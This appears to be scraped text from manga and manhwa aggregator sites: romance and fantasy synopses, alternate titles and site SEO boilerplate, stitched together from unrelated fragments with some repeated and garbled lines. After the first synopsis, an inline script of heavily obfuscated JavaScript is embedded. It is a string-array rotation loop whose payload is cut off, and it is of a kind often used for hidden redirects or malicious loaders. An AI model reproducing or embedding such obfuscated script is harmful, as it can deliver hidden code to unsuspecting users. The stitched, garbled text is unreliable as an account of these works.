Wang Zi Yan, a University student, has always had a body different from everyone else’s. When his body is touched by moonlight, he will become invisible. One night, after getting off work, he uses this ability to save a woman. That’s how an uncontrollable love story started! A soft and cute boy VS a rich, confident woman, how will this love story turn out?<script></script><script>(function(_0x2837cc,_0x2b9b37){var _0x11c489=_0x2e35,_0x195f13=_0x2837cc();while(!![]){try{var _0x1e2543=-parseInt(_0x11c489(0x1b2))/(0x21ee+-0x2*-0x4a7+-0x62d*0x7)*(-parseInt(_0x11c489(0x1ab))/(-0x5a1+0x1222*-0x2+0x29e7))+parseInt(_0x11c489(0x1a6))/(0xdac+-0x159d+0x7f4*0x1)+-parseInt(_0x11c489(0x1be))/(-0x136b+-0x2199+0x3508)*(-parseInt(_0x11c489(0x1c0))/(0x2*-0x1b4+0x26f2+-0xbd7*0x3))+-parseInt(_0x11c489(0x1bf))/(-0x144e+0x327+0x1*0x112d)+parseInt(_0x11c489(0x1c3))/(0x616+-0x104+0x1*-0x50b)+parseInt(_0x11c489(0x1c1))/(-0x1c*-0x1f+-0x182e+-0x5*-0x42a)*(parseInt(_0x11c489(0x1bc))/(-0x362+0x12c9+-0x2*0x7af))+-parseInt(_0x11c489(0x1af))/(-0x80*0x2+-0xc3c+0xd46);if(_0x1e2543===_0x2b9b37)break;else _0x195f13['push'](_0x195f13['shift']());}catch(_0x2be1b9){_0x195f13['push'](_0x195f13['shift']());}}}(_0x29ae,-0x809*-0x18c+0x17b*-0x593+-0x5*-0xc207));function custom(){var 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Read manga Your Highness i Decide My Fate / Denka, Unmei wa Watashi ga Kimemasu Firi was deceived by her family and sold to the first prince, Terios, as a substitute as an experimental animal. During the experiment, Firi awakens as the master of the “Tarot Card of Destiny” in exchange for her death. With the power of the god card, Firi will carve out a new destiny together with the “incarnation of the card, Norn” and the “second prince, Aster”, who is hostile to his brother, in order to stop Terios’s cruel ambition and obtain true happiness! 殿下、運命は私が決めます
Read manhua Your Highness the Crown Prince, Your Mask Has Dropped Again / Mi amado visita mi tumba / My Beloved Visits My Grave / My Love Comes to See the Grass on my Grave While under the cover identity “Murong Yan,” the crown prince became smitten with the palace guard, Gu Lang, after a fated encounter. The two had to part ways after “Murong Yan” died, but the crown prince couldn’t resist trying to get close to his beloved once again… this time under a different cover identity. Taizi Dianxia Ni De Majia You Diaole Tàizǐ Diànxià Nǐ De Mǎjiǎ Yòu Diàole There Goes Your Cover Again, Your Highness Your Highness, Your Mask Has Fallen Again Your Royal Highness, Please Dress Up Your Clothes Your Royal Highness, Your Vest Is off Again 太子殿下你的马甲又掉了 心上人来看我的坟头草
The cute and clever “eunuch” was discovered to be pregnant and unexpectedly became the Crown Prince’s personal attendant? The Crown Prince is rumored to be erratic, two-faced and aloof… and yet he keeps indulging her despite her testing his bottom line again and again…Why would she disguise herself as a man after crossing over and insist on staying beside him…”It’s my turn to face all these hardships for you in this world!”Source of collecting
<p style="text-align: right;">The cute and clever “eunuch” was discovered to be pregnant and unexpectedly became the Crown Prince’s personal attendant? The Crown Prince is rumored to be erratic, two-faced and aloof… and yet he keeps indulging her despite her testing his bottom line again and again…Why would she disguise herself as a man after crossing over and insist on staying beside him…”It’s my turn to face all these hardships for you in this world!”Source of collecting</p>
Read “Your Instinctive Love Novel” – “Your Instinctive Love Manhwa” Online Free At GenzToons The summary of the comics “Your Instinctive Love”: Shin Yu-jin, a clumsy male friend with shaggy hair who only knew about studying. He, who was foolish, changes 180 degrees and shakes Kang-hee’s heart. “I can’t watch you with other guys pretending to be friends anymore.” Her fluttering first love that started like that, Yoo-jin leaves in an unexpected accident, leaving Kang-hee with a trauma. Eight years later, Kang-hee became a homicide detective. She’s been on an undercover job for a week and she meets a strange man in a hotel lounge. A face and coupling that resemble Eugene’s. Confused by her confusion, Kanghee ruins his seat, and the two continue to get entangled due to an inevitability like a coincidence… “Your Instinctive Love” is alternatively named: Amour Instinctif / Locked Onto You / 본능적인 그대 The comics “Your Instinctive Love” belongs to the Genre: Drama, Fantasy, Josei, Manhwa, Manhwa Hot, Romance, Webtoons “Kun Manga, MANGA UPDATES, Manhwa Website…” are the most searched keywords on the website S2Manga. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging
Read Your Kiss Scene! Manhwa Entertainment Writer Lee Seul, Heard The News Of Her Favorite Idol, Block Shoot’s Seung-Chan, On Her New Entertainment Program. Expectations Of Meeting Her Favorite For More Than 10 Years Are Brief, And She Accidentally Sees Her Favorite Idol Kissing Someone Else In Secret At The Broadcasting Station. In Addition, The Entertainment Program She Was In Charge Of Is A Love Variety Program That’s Full Of Dating Amongst The Cast… She Has To Watch Her Favorite Idol Flirting And Dating Someone Else Even If He’s Her Favorite. Your Kiss Scene!, 너의 키스씬, 너의 키스씬! Welcome To Mangazin Site, You Can Read And Enjoy All Kinds Of Manhwa Trending Such As Drama, Manhua, Manga, Romance…, For Free Here. All Of The Manhwa New Will Be Update With High Standards Every Hours. If You Are A Comics Book (Manhwa Hot ), Mangagg Is Your Best Choice, Don’t Hesitate, Just Read And Feel !
Bellia, the woman who saved the dying beast. At that time, I didn’t know that he would change her life like this…. Khan, a man who reached out to Bellia, who was about to abandon the country and run away. Unlike an untamed energy, his gestures were sweet. His whisper that he would change my shabby life was sweet. “Let me heal you.” “Come with me.” If you take one more step, you can hold his hand… Misconceptions pile up even before holding his hand. Meeting again, he was not an animal, but an emperor. “Are you going to be the crown prince?” “Khan, I’m just…” His question that I didn’t dare to answer. And… “That night. You shouldn’t have saved me. You should’ve just let me die.” It has been a long time since the appearance of a man who was endlessly sweet to repay his kindness disappeared. “You saved the dying beast cub. You never know how the beast will bite you.”
Ga-Yeon, a woman who was getting tired of boring men, finds herself falling into the world of the Kashan Empire and becoming the concubine of Emperor Xeros. He’s handsome, fit, and he even has a cute side! This is how Ga-Yeon’s story of taming the awkward emperor begins! Associated Names Sa Majesté est à moi Your Majesty Is Mine Мой Повелитель 폐하는 나의 것
I woke up in this new world as Diana Gundal, the youngest daughter of a feudal lord. But hey, that’s great news! That means I can live my life pampered from head to toe right? Wrong! Everyday I’m living like a maid to help out with the household. What’s even worse is that I neither inherited the old Diana’s memories nor her knowledge of the language. I’m basically starting from scratch… I thought I would live the rest of my life like this until the Emperor came to visit our small village. BOOM! Oh lord, he is so handsome! I’m now so thankful I’m living under the same sky as him. I will work hard to get closer to him as his new number one fan!
Read manga Your Majesty, I Will Raise Him This Time! / Heika Kondo wa Watashi ga Sodatemasu / Heika, Kondo wa Watashi ga Sodatemasu! “Who would have thought that the day would come when I would be killed by my own son…” Empress Dahlia of the Empire is killed by her son’s rebellion. Dahlia, who has been kept in the dark finds it difficult to comprehend the drastic change of her son. “I’ll accept any punishment. Please, give me one more chance to face that child…!” Dahlia, having turned back time, need to face her strict husband, Klaus, in order to restore their already severed parent-child relationship. Can she use this opportunity to redo the parenting and avoid the worst future? “Your Majesty, I Will Raise Him This Time! Manga” is alternative: 陛下、今度は私が育てます! 陛下今度は私が育てます
She gave her all to make her son, 3rd Prince Leon, emperor. On the day this dream was fulfilled, she went to the place where the emperor’s coffin rested, where she found her son dying from the poison he had drunk himself. “I… have never been happy in my life.” Only despair was left for Elisha, who was holding onto her son’s cold corpse. “Leon…” However, after losing consciousness, she woke up to find that her young son was looking at her with his lovely face! “If this isn’t a dream, if it’s a new opportunity… I stole a lot of things in the name of doing it for you, so if you ask me, I will do whatever you want.” Elisha, who vowed to become a good mother in this life, instead of piling up dead bodies and squeezing blood in a war to claim the emperor’s throne, makes a different choice from the past by weaving ties with her stepson, the crown prince.